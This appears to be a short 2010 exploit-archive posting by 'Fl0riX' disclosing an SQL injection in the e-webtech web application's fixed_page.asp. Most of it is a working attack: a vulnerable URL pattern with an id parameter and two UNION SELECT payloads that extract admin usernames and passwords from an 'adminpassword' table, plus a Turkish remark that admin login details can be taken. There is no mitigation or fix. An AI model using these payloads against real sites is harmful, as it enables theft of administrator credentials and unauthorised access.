e-webtech (fixed_page.asp) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : e-webtech (fixed_page.asp) SQL Injection Vulnerability
# Published : 2010-05-12
# Author : Fl0riX
# Previous Title : Joomla Custom PHP Pages Component com_php LFI Vulnerability
# Next Title : PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability

####################################################
    e-webtech (fixed_page.asp) SQL Injection Vulnerability 
####################################################
# Author   : Fl0riX 
# 
# Name     : e-webtech
# 
# Bug Type   : SQL Injection 
# 
# Infection    : Admin login bilgileri alinabilir. 
# 
# Demo Vuln : 
# 
# http://[site]/fixed_page.asp?id=[SQL Inj.]
#
# User Exploit:null+union+all+select+1,username+from+adminpassword
# Password Exploit:null+union+all+select+1,pw+from+adminpassword
####################################################